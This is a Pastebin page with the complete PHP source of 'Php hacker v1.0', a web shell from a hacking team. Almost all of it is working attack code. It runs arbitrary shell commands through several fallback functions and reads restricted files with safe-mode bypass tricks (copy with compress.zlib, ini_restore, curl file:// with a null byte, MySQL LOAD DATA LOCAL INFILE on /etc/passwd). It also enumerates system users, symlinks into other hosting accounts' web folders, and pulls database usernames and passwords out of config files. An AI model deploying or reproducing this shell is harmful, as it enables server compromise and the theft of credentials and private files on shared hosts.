API tools faq
paste
Advertisement
1337_Brain

Php hacker v1.0

1337_Brain
Jul 14th, 2014
497
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.72 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. /*###########################################
  3. NameScrip : Php hacker v1.0
  4. Private For Hack15 Members ..
  5. Coder By GeNiUs HaCkEr - Team Hack15
  6. Mails : Linux@Nesma.Net.Sa & Vv9@Hotmail.Com
  7. WwW.Hack15.CoM                           
  8. ###########################################*/
  9. error_reporting(0);
  10. set_magic_quotes_runtime(0);
  11. if(version_compare(phpversion(), '4.1.0') == -1)
  12.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  13.  $_SERVER = &$HTTP_SERVER_VARS;
  14.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  15. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  16. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  17. else{return $requ."?".$link."=".$val;}}
  18. function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";}
  19. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  20. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  21. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  22. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  23. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  24. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  25. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  26. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  27. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  28. print htmlspecialchars($pret);}}
  29. function input($type,$name,$value,$size)
  30. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  31. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  32. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  33. else {print "<input type=$type name=$name value=$value size=$size >";}}
  34. function permcol($path){if (is_writable($path)){print "<font color=#008080>";
  35. callperms($path); print "</font>";}
  36. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
  37. callperms($path); print "</font>";}
  38. else {print "<font color=white>";callperms($path);}}
  39. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  40. function download($dwfile) {$size = filesize($dwfile);
  41. @header("Content-Type: application/force-download;name=$dwfile");
  42. @header("Content-Transfer-Encoding: binary");
  43. @header("Content-Length: $size");
  44. @header("Content-Disposition: attachment; filename=$dwfile");
  45. @header("Expires: 0");
  46. @header("Cache-Control: no-cache, must-revalidate");
  47. @header("Pragma: no-cache");
  48. @readfile($dwfile); exit;}
  49. ?>
  50. <html>
  51. <head><title>Hack15Shell</title></head>
  52. <style>
  53. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: #008080; }
  54. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  55. a:hover{color:#008080}
  56. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  57. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  58. div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}
  59. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  60. <body bgcolor=black text=white><font face="sans ms" size=3>
  61. </body>
  62. </html>
  63. <?
  64. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  65. $sf="<form method=post>";$ef="</form>";
  66. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  67. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  68. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  69. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  70. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  71. ################# Editing By User ########################
  72. ///////////////////////////////
  73.                              //
  74. $mysql_use = "no"; //"yes"   //
  75. $mhost = "localhost";        //
  76. $muser = "root";             //
  77. $mpass = "pass";             //
  78. $mdb = "name";               //
  79. $them = "xxx"; //any site    //
  80. $you = "xx"; //your username //
  81. $flib = "hack15.txt";        //
  82. $folder = "hack15.txt";      //
  83. ///////////////////////////////
  84. ################# PhP Design (Start) ########################
  85. delm(": Php Hacker v1.0 (Shell) :");
  86. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>[ Php hacker v1.0 ]::[ Owned By Yourname ]
  87. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  88. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('linux', 'greet').">Gr33tz To</a>";
  89. print " - <a href='javascript:history.back()'>Back</a>";
  90. print "</td></tr></table>";
  91. echo "<br>";
  92. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  93. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  94.     {
  95.      $safemode = true;
  96.      $hsafemode = "<font color=\"red\">ON (secure)</font>";
  97.     }
  98.     else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  99.     echo("Safe-mode: $hsafemode");
  100. print "</td></tr></table>";
  101. echo "<br>";
  102. ################# PhP Hacked ########################
  103. // read greet //
  104. if ($linux=='greet')
  105. {
  106. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  107. echo "GeNiUs HaCkEr & Blood Hacker & Mr.ALJoOoKeR & Dr_Whad_Drb & Saudi Hunter & Saudi Coder &  ROMANCY-HACKER & Qatil_Albasik & Caeser & KsA HaCkEr & Hacker Zero & Mr.Shares & Dr.Shares
  108. ";
  109.   echo "</textarea>";
  110. }
  111. // read file unzend sorce //
  112. if(empty($_POST['sorce'])){
  113. } else {
  114.  
  115. }
  116. // read file unzend functions //
  117.  if(empty($_POST['func'])){
  118. } else {
  119. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  120. $zeen=$_POST['func'];
  121. require("$zeen");
  122. echo "Database : ".$config['Database']['dbname']." <X> ";
  123. echo "UserName : ".$config['MasterServer']['username']." <X> ";
  124. echo "Password : ".$config['MasterServer']['password']." <X> ";
  125. echo "</textarea></p>";
  126. }// read file symlink ( ) //
  127. if(empty($_POST['sym'])){
  128. } else {
  129. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  130. $fp = fopen("hack15.txt","w+");
  131. fwrite($fp,"Php Hacker Was Here");
  132. @unlink($flib);
  133. $sym = "/home/" . $them . "/public_html/" . $k;
  134. $link = "/home/"  . $you . "/public_html/" . $folder . "/" . $flib;
  135. @symlink($sym, $link);
  136. if ($k{0} == "/") {
  137. echo "<script> window.location = '" . $flib . "'</script>";
  138. }else{
  139. echo "<pre><xmp>";
  140. echo readlink($flib) . "\n";
  141. echo "Filesize: " . linkinfo($flib) . "B\n\n";
  142. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/"  . $folder . "/" . $flib);
  143.   echo "</textarea>";
  144. }
  145. }
  146.  
  147. // read file plugin ( ) //
  148. if(empty($_POST['plugin'])){
  149. } else {
  150. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  151. for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  152.  $ara = posix_getpwuid($uid);
  153.   if (!empty($ara)) {
  154.        while (list ($key, $val) = each($ara)){
  155.         print "$val:";
  156.   }
  157.   print "\n";
  158.      }
  159.   }
  160.   echo "</textarea>";
  161. }
  162. // read file id ( ) //
  163. if ($_POST['rid'] ){
  164. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  165.  for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  166. $ara = posix_getpwuid($uid);
  167.  if (!empty($ara)) {
  168. while (list ($key, $val) = each($ara)){
  169. print "$val:";
  170. }
  171.  print "\n";
  172. }
  173.  }
  174. echo "</textarea>";
  175. break;
  176.  
  177.  }
  178. // read file imap ( ) //
  179. $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
  180. if(empty($_POST['rimap'])){
  181. } else {
  182. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  183. $stream = imap_open($string, "", "");
  184. $str = imap_body($stream, 1);
  185. echo "</textarea>";
  186. }
  187. // read file Curl ( ) //
  188. if(empty($_POST['curl'])){
  189. } else {
  190. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  191. $m=$_POST['curl'];
  192. $ch =
  193. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  194. curl_exec($ch);
  195. var_dump(curl_exec($ch));
  196. echo "</textarea>";
  197. }
  198.  
  199. // read file SQL ( ) //
  200. if(empty($_POST['ssql'])){
  201. } else {
  202. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  203. $file=$_POST['ssql'];
  204.  
  205.  
  206. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  207. $mysql_files = explode(':', $mysql_files_str);
  208.  
  209. $sql = array (
  210. "USE $mdb",
  211. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  212. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  213. . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  214. . "ESCAPED BY          '' "
  215. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  216.  
  217. "SELECT a FROM $tbl LIMIT 1"
  218. );
  219. mysql_connect ($mhost, $muser, $mpass);
  220.  
  221.                                 foreach ($sql as $statement) {
  222.                                    $q = mysql_query ($statement);
  223.  
  224.                                    if ($q == false) die (
  225.                                       "FAILED: " . $statement . "\n" .
  226.                                       "REASON: " . mysql_error () . "\n"
  227.                                    );
  228.  
  229.                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  230.  
  231.                                    echo htmlspecialchars($r[0]);
  232.                                    mysql_free_result ($q);
  233.                                 }
  234. echo "</textarea>";
  235. }
  236.  
  237.  
  238.  
  239. // read file copy & ini ( ) //
  240. if (isset ($_REQUEST['safefile'])){
  241. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  242. if(empty($_GET['file'])){if(empty($_POST['file'])){
  243. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  244. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  245. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  246. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  247. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  248. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  249. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  250. ini_restore("safe_mode");ini_restore("open_basedir");
  251. print "<center><pre>".$sta;
  252. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
  253. delm(": Safe mode bypass :");
  254. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  255. print "<tr><td width=50%><div align=left>";
  256. print $st.$c1."<div><b><center>Using copy() function</div>";
  257. print $ec.$c2.$sf."&nbsp;";
  258. input("text","safefile",$nscdir,75);
  259. input("hidden","scdir",$nscdir,0);print " ";
  260. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  261. print "</td><td height=20% width=50%><div align=right>";
  262. print $st.$c1."<div><b><center>Using ini_restore() function</div>";
  263. print $ec.$c2.$sf."&nbsp;";
  264. input("text","inifile",$nscdir,75);
  265. input("hidden","scdir",$nscdir,0);print " ";
  266. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  267. print "</td></tr></table>";
  268. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  269. print "<tr><td width=50%><div align=left>";
  270. print $st.$c1."<div><b><center>Using sql() function</div>";
  271. print $ec.$c2.$sf."&nbsp;";
  272. input("text","ssql",$nscdir,75);
  273. input("hidden","scdir",$nscdir,0);print " ";
  274. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  275. print "</td><td height=20% width=50%><div align=right>";
  276. print $st.$c1."<div><b><center>Using Curl() function</div>";
  277. print $ec.$c2.$sf."&nbsp;";
  278. input("text","curl",$nscdir,75);
  279. input("hidden","scdir",$nscdir,0);print " ";
  280. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  281. print "</td></tr></table>";
  282. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  283. print "<tr><td width=50%><div align=left>";
  284. print $st.$c1."<div><b><center>Using imap() function</div>";
  285. print $ec.$c2.$sf."&nbsp;";
  286. input("text","rimap",$nscdir,75);
  287. input("hidden","scdir",$nscdir,0);print " ";
  288. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  289. print "</td><td height=20% width=50%><div align=right>";
  290. print $st.$c1."<div><b><center>Using id() function</div>";
  291. print $ec.$c2.$sf."&nbsp;";
  292. input("text","rid",$nscdir,75);
  293. input("hidden","scdir",$nscdir,0);print " ";
  294. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  295. print "</td></tr></table>";
  296. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  297. print "<tr><td width=50%><div align=left>";
  298. print $st.$c1."<div><b><center>Using plugin() function</div>";
  299. print $ec.$c2.$sf."&nbsp;";
  300. input("text","plugin",$nscdir,75);
  301. input("hidden","scdir",$nscdir,0);print " ";
  302. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  303. print "</td><td height=20% width=50%><div align=right>";
  304. print $st.$c1."<div><b><center>Using symlink() function</div>";
  305. print $ec.$c2.$sf."&nbsp;";
  306. input("text","sym",$nscdir,75);
  307. input("hidden","scdir",$nscdir,0);print " ";
  308. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  309. print "</td></tr></table>";
  310. delm(": Unzend Config :");
  311. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  312. print "<tr><td width=50%><div align=left>";
  313. print $st.$c1."<div><b><center>Connect To Functions Of Config</div>";
  314. print $ec.$c2.$sf."&nbsp;";
  315. input("text","func",$nscdir,75);
  316. input("hidden","scdir",$nscdir,0);print " ";
  317. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  318. print "</td></tr></table>";
  319. ?><?
  320. print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";
  321. print"<tr><td><font size=2 face=tahoma>";
  322. print"<center>Coder By GeNiUs HaCkEr <br>[ Team Hack15 :: Go to : <a target='_blank' href='http://www.Hack15.com'>Http://Hack15.com</a> ]";
  323. print"</font></td></tr></table>";
  324. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!